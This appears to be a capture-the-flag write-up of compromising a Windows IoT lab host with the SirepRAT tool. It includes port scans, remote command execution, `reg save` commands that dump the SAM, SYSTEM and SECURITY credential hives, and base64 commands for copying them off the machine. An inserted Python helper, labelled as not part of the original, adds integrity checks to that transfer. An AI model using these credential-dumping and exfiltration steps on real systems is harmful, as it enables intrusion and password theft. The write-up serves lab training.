135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

nc 10.129.2.27 29819
PING

nc 10.129.2.27 29820
*LY`G﹎蓕萇

Searching for this fingerprint identified the service as SirepRAT.

<https://github.com/SafeBreach-Labs/SirepRAT>

Found the tool on GitHub, installed it and used it.

python SirepRAT.py 10.129.2.27 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>

image-20220417135938730

Testing confirmed the vulnerability was present, so I exploited it directly.

Downloading nc with certutil and System.Net.WebClient failed here, so I used PowerShell's Invoke-WebRequest instead.

image-20220417142127594

C:\Data\Users>echo %username%
echo %username%
DefaultAccount
There is no whoami, so the environment variable was used to identify the current user.

image-20220417144323255

Tried adding an admin user, but this seemed to require UAC; the usual methods all said the Windows version was unsupported, and I was stuck for a while. After restarting the next day I found the environment had changed: the user had become omni and the current user had become SYSTEM... rather speechless.

Then, looking at root.txt, I found it was encrypted with System.Management.Automation.PSCredential, so I went to dump credentials; tools like mimikatz could not be executed, so I exported the hives instead.

image-20220418174943463

reg save HKLM\sam C:\data\users\public\sam
reg save HKLM\system C:\data\users\public\system
reg save HKLM\security C:\data\users\public\security
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\data\users\public\sam"))   # base64 the file (repeat for system and security) and copy it to the local machine; if it is too large, transfer it with nc instead
[IO.File]::WriteAllBytes("sam", [Convert]::FromBase64String([IO.File]::ReadAllText("sam.txt")))   # decode back to the binary hive
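The base64 copy-paste transfer above has two failure modes worth guarding against: terminals and clipboards insert line breaks and stray whitespace into long base64 strings, and a hive that is "too large" is easy to truncate mid-transfer without noticing, which silently yields an unusable hive. The following is an added example, not part of the original writeup or the SirepRAT project, that mirrors the ToBase64String/FromBase64String round trip in Python: it wraps the encoded text into lines, strips any whitespace on the receiving side, and verifies a SHA-256 digest so a truncated or corrupted transfer is detected rather than written out as a hive. The sample payload is a constructed byte string standing in for an exported registry hive.

```python
import base64
import hashlib

# Constructed stand-in for a hive exported with `reg save` (not real hive data).
SAMPLE_HIVE = bytes(range(256)) * 40  # 10240 bytes


def encode_for_transfer(data: bytes, line_len: int = 76) -> tuple[str, str]:
    """Base64-encode `data` and wrap it into lines of `line_len` characters.

    Returns (wrapped_text, sha256_hex). The digest is computed over the raw
    bytes so the receiver can confirm the decoded hive is byte-for-byte intact.
    """
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + line_len] for i in range(0, len(b64), line_len)]
    return "\n".join(lines), hashlib.sha256(data).hexdigest()


def decode_from_transfer(text: str, expected_sha256: str) -> bytes:
    """Reverse of encode_for_transfer with integrity checking.

    All whitespace (newlines, CRLF, indentation added by a clipboard or
    terminal) is removed before decoding. `validate=True` rejects any
    non-alphabet character instead of silently discarding it, and the digest
    comparison catches a truncated or otherwise corrupted transfer.
    """
    cleaned = "".join(text.split())
    data = base64.b64decode(cleaned, validate=True)
    digest = hashlib.sha256(data).hexdigest()
    if digest != expected_sha256:
        raise ValueError(f"integrity check failed: got {digest}, expected {expected_sha256}")
    return data


def roundtrip(data: bytes) -> bool:
    """Encode, then decode with verification, and report whether data survived."""
    text, digest = encode_for_transfer(data)
    return decode_from_transfer(text, digest) == data


if __name__ == "__main__":
    wrapped, digest = encode_for_transfer(SAMPLE_HIVE)
    print(f"{len(wrapped.splitlines())} lines, sha256={digest}")
    print("round trip ok:", roundtrip(SAMPLE_HIVE))
    try:
        decode_from_transfer(wrapped[:-8], digest)  # simulate a cut-off paste
    except ValueError as exc:
        print("truncated transfer rejected:", exc)
```

On the PowerShell side the same line wrapping is available as `[Convert]::ToBase64String($bytes, 'InsertLineBreaks')`, and .NET's FromBase64String ignores whitespace, which is why the original command still decodes a wrapped blob; what it does not do is tell you the blob was cut short, so comparing a hash of the decoded hive against one taken on the source host is the check to add.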

image-20220418184812419

image-20220418210834064